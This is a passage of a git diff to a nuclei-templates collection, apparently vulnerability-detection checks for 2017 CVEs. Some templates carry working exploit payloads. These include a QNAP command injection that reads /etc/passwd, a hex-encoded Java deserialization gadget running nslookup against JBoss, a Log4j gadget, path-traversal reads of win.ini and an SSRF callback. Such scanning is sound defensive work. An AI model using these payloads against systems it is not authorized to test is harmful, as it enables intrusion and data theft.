at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-18566.yaml b/nuclei-templates/CVE-2017/CVE-2017-18566.yaml index 066007d8e1..fdd8dd2053 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-18566.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-18566.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: user_role framework: wordpress publicwww-query: "/wp-content/plugins/user-role/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft http: - raw: @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 4a0a00473045022100ddd41eb1e0cadcf8a5168f05c0eb31fcfc9f235e71cb2d7cc77df1dd79fa3462022004e7f4466551bd1625930205949aafaee29f0f9371141056d11cdeb949d5b773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d379d9480f868260b65e821ad630ab781d2dd52c2f0e25e667b41cf3bf9c7cb022068938f861976e3222cbe26a54ec296eef974f942967912acb942edb9a52d2f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-18638.yaml b/nuclei-templates/CVE-2017/CVE-2017-18638.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-18638.yaml rename to nuclei-templates/CVE-2017/CVE-2017-18638.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-5645.yaml b/nuclei-templates/CVE-2017/CVE-2017-5645.yaml index eed23e98a7..fa34d154c7 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-5645.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-5645.yaml @@ -6,29 +6,41 @@ info: severity: critical description: | In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. + impact: | + Successful exploitation of this vulnerability could allow remote attackers to execute arbitrary commands on the affected server. + remediation: | + Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups. reference: - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 - https://nvd.nist.gov/vuln/detail/CVE-2017-5645 + - http://www.openwall.com/lists/oss-security/2019/12/19/2 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html + - http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2017-5645 + cwe-id: CWE-502 + epss-score: 0.81948 + epss-percentile: 0.98292 + cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 2 - tags: vulhub,network,apache,log4j,rce,deserialization,oast - + vendor: apache + product: log4j + tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast variables: end: "\r\n" - tcp: - - inputs: - - data: "{{generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)}}" - - host: + - host: - "{{Hostname}}" - "{{Host}}:4712" - + inputs: + - data: "{{generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)}}" read-size: 100 matchers: - type: word part: interactsh_protocol words: - dns +# digest: 490a0046304402206bea1e2f766c4391d5fed24e01caf16856956008980638b1d2fd3c8625f6fc33022031b5800c1421dcd3042cbc5d1d34d7f16b5cdc056336d3d5ecc4e6cd55325003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-5689.yaml b/nuclei-templates/CVE-2017/CVE-2017-5689.yaml index 00ab832295..31c5b32685 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-5689.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-5689.yaml @@ -1,37 +1,47 @@ id: CVE-2017-5689 info: - name: Intel Active Management Technology - Authentication Bypass + name: Intel Active Management - Authentication Bypass author: pdteam severity: critical description: | - An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT). + Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Intel Active Management firmware, potentially leading to unauthorized control of the affected system. + remediation: | + Update the Intel Active Management firmware to version 11.6.55, 11.7.55, 11.11.55, 11.0.25, 8.1.71, or 7.1.91 to mitigate the vulnerability. reference: - https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr - https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability - https://www.embedi.com/news/mythbusters-cve-2017-5689 - https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf + - https://nvd.nist.gov/vuln/detail/cve-2017-5689 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-5689 + epss-score: 0.97395 + epss-percentile: 0.99912 + cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: intel + product: active_management_technology_firmware shodan-query: title:"Active Management Technology" - verified: "true" - tags: cve,cve2017,amt,intel,tenable,kev + tags: cve2017,cve,amt,intel,tenable,kev -requests: +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | GET /hw-sys.htm HTTP/1.1 Host: {{Hostname}} digest-username: admin - req-condition: true + matchers-condition: and matchers: - type: word @@ -44,3 +54,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100c1ebf3bfcfaab0443bed7c0c3767867af141501aac600f4f387e61c7d0dab97c022060fd9aabe9ac1b63059fb46dfa7eb24a6b438f68a5ee9f4f028cb7e65532233c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-6361.yaml b/nuclei-templates/CVE-2017/CVE-2017-6361.yaml deleted file mode 100644 index 90710cf3a2..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-6361.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: CVE-2017-6361 -info: - name: QNAP QTS RCE - author: medbsq - severity: critical -# https://www.cvebase.com/cve/2017/6360 - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/authLogin.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;cat%20/etc/passwd)>%262" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "root:[x*]:0:0:" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-7391.yaml b/nuclei-templates/CVE-2017/CVE-2017-7391.yaml index 3d3c5e1be3..b17e18d01d 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-7391.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-7391.yaml @@ -1,7 +1,7 @@ id: CVE-2017-7391 info: - name: Magmi Cross-Site Scripting v.0.7.22 + name: Magmi – Cross-Site Scripting v.0.7.22 author: pikpikcu severity: medium description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. @@ -25,13 +25,12 @@ requests: - type: status status: - 200 - - type: word - part: body words: - '"><' + part: body - type: word - part: header words: - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-7504.yaml b/nuclei-templates/CVE-2017/CVE-2017-7504.yaml deleted file mode 100644 index e40ee0b986..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-7504.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2017-7504 - -info: - name: jBoss HTTPServerILServlet Deserialization - author: j4vaovo - severity: critical - description: | - HTTPServerILServlet.java in JMS over HTTP Invocation Layer of the JbossMQ implementation, which is enabled by default in Red Hat Jboss Application Server <= Jboss 4.X does not restrict the classes for which it performs deserialization, which allows remote attackers to execute arbitrary code via crafted serialized data. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7504 - - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-7504 - - https://nvd.nist.gov/vuln/detail/CVE-2017-7504 - tags: cve,cve2017,deserialization,jboss - -variables: - prefix: "aced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000005574002679736f73657269616c2e7061796c6f6164732e436f6d6d6f6e73436f6c6c656374696f6e7335740018436f6d6d6f6e73436f6c6c656374696f6e73352e6a6176617400096765744f626a6563747371007e000b0000002f71007e000d71007e000e71007e000f7371007e000b0000002274001979736f73657269616c2e47656e65726174655061796c6f616474001447656e65726174655061796c6f61642e6a6176617400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00077872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e001a78737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b657971007e00014c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00017870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e003200000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00327371007e002b7571007e002f00000002707571007e002f00000000740006696e766f6b657571007e003200000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e002f7371007e002b757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007870000000017400" - suffix: "740004657865637571007e00320000000171007e00377371007e0027737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878" - cmd: 'nslookup {{interactsh-url}}' - cmdhex: "{{hex_encode('{{cmd}}')}}" - len: "{{len('{{cmd}}')}}" - lenhex: "{{dec_to_hex({{len}})}}" - commons-collections5: "{{hex_decode('{{prefix}}{{lenhex}}{{cmdhex}}{{suffix}}')}}" - -http: - - raw: - # - | - # POST /jbossmq-httpil/HTTPServerILServlet HTTP/1.1 - # Host: {{Hostname}} - - # {{generate_java_gadget("commons-collections5", "ping {{interactsh-url}}", "raw")}} - - - | - POST /jbossmq-httpil/HTTPServerILServlet HTTP/1.1 - Host: {{Hostname}} - - {{commons-collections5}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: header - words: - - "x-java-serialized-object" diff --git a/nuclei-templates/CVE-2017/CVE-2017-7855.yaml b/nuclei-templates/CVE-2017/CVE-2017-7855.yaml index fa1dc0032b..73a298378d 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-7855.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-7855.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2017-7855 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.378 + epss-percentile: 0.37043 cpe: cpe:2.3:a:icewarp:server:11.3.1.5:*:*:*:*:*:*:* metadata: verified: true @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022006d14916bd38c6b34cc8f0fa1124cd629376e520c9ce9628245fe587f7555f9b02200102baabcb9b473b2f3f5873a6fd77743c2cd59554869fc4785f922c9700e825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecd748d0da7f1f3e5a44b0351d29bf699e21b0bcfd59e00013b81f7dde887d6f02204f738f06eb2c47e277ac21b6bf66fc965783038678586e2b9e397c57124bc240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-7925.yaml b/nuclei-templates/CVE-2017/CVE-2017-7925.yaml index fd446cc819..4e91d62001 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-7925.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-7925.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information. + impact: | + This vulnerability can lead to unauthorized access to sensitive information, potentially compromising the security of the system. remediation: | To remediate this vulnerability, ensure that the configuration file is properly secured and access to it is restricted to authorized personnel only. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2017-7925 cwe-id: CWE-522,CWE-260 - epss-score: 0.35031 - epss-percentile: 0.96704 + epss-score: 0.42592 + epss-percentile: 0.97235 cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dahuasecurity product: dh-ipc-hdbw23a0rn-zs_firmware shodan-query: http.favicon.hash:2019488876 - tags: cve,cve2017,dahua,camera + tags: cve,cve2017,dahua,camera,dahuasecurity http: - method: GET @@ -45,4 +47,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 490a004630440220133bea5d926eae339ba584119c447e358883137e19b11aa0b7925ebf56f72432022005f75a1de089c0a7bcdfa891d0e4326915bb5100d61b522e3bc025f7347069fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-8229.yaml b/nuclei-templates/CVE-2017/CVE-2017-8229.yaml new file mode 100644 index 0000000000..d2bb37a789 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-8229.yaml @@ -0,0 +1,58 @@ +id: CVE-2017-8229 + +info: + name: Amcrest IP Camera Web Management - Data Exposure + author: pussycat0x + severity: critical + description: | + Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials. + impact: | + An attacker can gain unauthorized access to sensitive data. + remediation: | + Apply the latest firmware update provided by the vendor to fix the vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-8229 + - http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html + - https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf + - https://seclists.org/bugtraq/2019/Jun/8 + - https://github.com/d4n-sec/d4n-sec.github.io + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-8229 + cwe-id: CWE-255 + epss-score: 0.89506 + epss-percentile: 0.98685 + cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: amcrest + product: ipm-721s_firmware + shodan-query: html:"Amcrest" + fofa-query: "Amcrest" + tags: cve2017,cve,packetstorm,seclists,amcrest,iot + +http: + - method: GET + path: + - "{{BaseURL}}/current_config/Sha1Account1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DevInformation" + - "SerialID" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100b6fd9d1debb3a00599d529ed9870adb5c6425994cafe24875150518f3a770549022010a916473eeea40a72614d21ce4acd2715c401e4e6bd33fd9bdf6440eac4788d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-9416.yaml b/nuclei-templates/CVE-2017/CVE-2017-9416.yaml index dc0fb55569..f2bc24d415 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-9416.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-9416.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Allows an attacker to read arbitrary files on the server. remediation: | Upgrade to a patched version of Odoo or apply the necessary security patches. reference: @@ -17,14 +19,14 @@ info: cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.01037 - epss-percentile: 0.8223 + epss-percentile: 0.83585 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: odoo product: odoo - tags: cve,cve2017,odoo,lfi + tags: cve2017,cve,odoo,lfi http: - method: GET @@ -49,4 +51,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a00473045022100b7868cfb6aea9ffd5205db402460677e412d6dc7235c64ee3a48cc03de50f6cb0220544468c465d73cb5a5a239d38bd98fc3ae0600999c558117389c355815ae1baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-9506.yaml b/nuclei-templates/CVE-2017/CVE-2017-9506.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-9506.yaml rename to nuclei-templates/CVE-2017/CVE-2017-9506.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-9822.yaml b/nuclei-templates/CVE-2017/CVE-2017-9822.yaml index 855f7261ea..09de04f19d 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-9822.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-9822.yaml @@ -1,20 +1,18 @@ id: CVE-2017-9822 + info: - name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution + name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) author: milo2012 severity: high - description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution. - reference: - - https://github.com/murataydemir/CVE-2017-9822 - - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 - - http://www.dnnsoftware.com/community/security/security-center - - http://www.securityfocus.com/bid/102213 + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) + tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization + reference: https://github.com/murataydemir/CVE-2017-9822 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2017-9822 cwe-id: CWE-20 - tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization + requests: - raw: - | @@ -23,6 +21,7 @@ requests: Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini + matchers-condition: and matchers: - type: word @@ -31,8 +30,7 @@ requests: - 'for 16-bit app support' part: body condition: and + - type: status status: - 404 - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000027.yaml b/nuclei-templates/CVE-2017/cve-2017-1000027.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-1000027.yaml rename to nuclei-templates/CVE-2017/cve-2017-1000027.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-11512.yaml b/nuclei-templates/CVE-2017/cve-2017-11512.yaml deleted file mode 100644 index 095801ddf9..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-11512.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2017-11512 - -info: - name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: | - ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. - reference: - - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - - https://www.tenable.com/security/research/tra-2017-31 - - https://web.archive.org/web/20210116180015/https://www.securityfocus.com/bid/101789/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-11512 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-11512 - cwe-id: CWE-22 - metadata: - shodan-query: http.title:"ManageEngine" - verified: "true" - tags: cve,cve2017,manageengine,lfr,unauth,tenable - -requests: - - method: GET - path: - - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' - - '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini' - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/CVE-2017-11586.yaml b/nuclei-templates/CVE-2017/cve-2017-11586.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-11586.yaml rename to nuclei-templates/CVE-2017/cve-2017-11586.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12544.yaml b/nuclei-templates/CVE-2017/cve-2017-12544.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-12544.yaml rename to nuclei-templates/CVE-2017/cve-2017-12544.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12635.yaml b/nuclei-templates/CVE-2017/cve-2017-12635.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-12635.yaml rename to nuclei-templates/CVE-2017/cve-2017-12635.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-14849.yaml b/nuclei-templates/CVE-2017/cve-2017-14849.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-14849.yaml rename to nuclei-templates/CVE-2017/cve-2017-14849.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-18536.yaml b/nuclei-templates/CVE-2017/cve-2017-18536.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-18536.yaml rename to nuclei-templates/CVE-2017/cve-2017-18536.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-18598.yaml b/nuclei-templates/CVE-2017/cve-2017-18598.yaml index d030fe66cd..b7393b1790 100644 --- a/nuclei-templates/CVE-2017/cve-2017-18598.yaml +++ b/nuclei-templates/CVE-2017/cve-2017-18598.yaml @@ -1,34 +1,62 @@ -id: CVE-2017-18598 - -info: - name: Qards Plugin - Stored XSS and SSRF - author: pussycat0x - severity: medium - description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php - reference: - - https://wpscan.com/vulnerability/8934 - - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 - tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast - +id: CVE-2017-18598 + +info: + name: WordPress Qards - Cross-Site Scripting + author: pussycat0x + severity: medium + description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. + remediation: | + Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability. + reference: + - https://wpscan.com/vulnerability/8934 + - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 + - https://wpvulndb.com/vulnerabilities/8934 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-18598 cwe-id: CWE-79 -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: body - words: - - "console.log" \ No newline at end of file + epss-score: 0.00094 + epss-percentile: 0.38554 + cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: designmodo + product: qards + framework: wordpress + tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/qards/' + + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "console.log" +# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-3528.yaml b/nuclei-templates/CVE-2017/cve-2017-3528.yaml similarity index 100% rename from 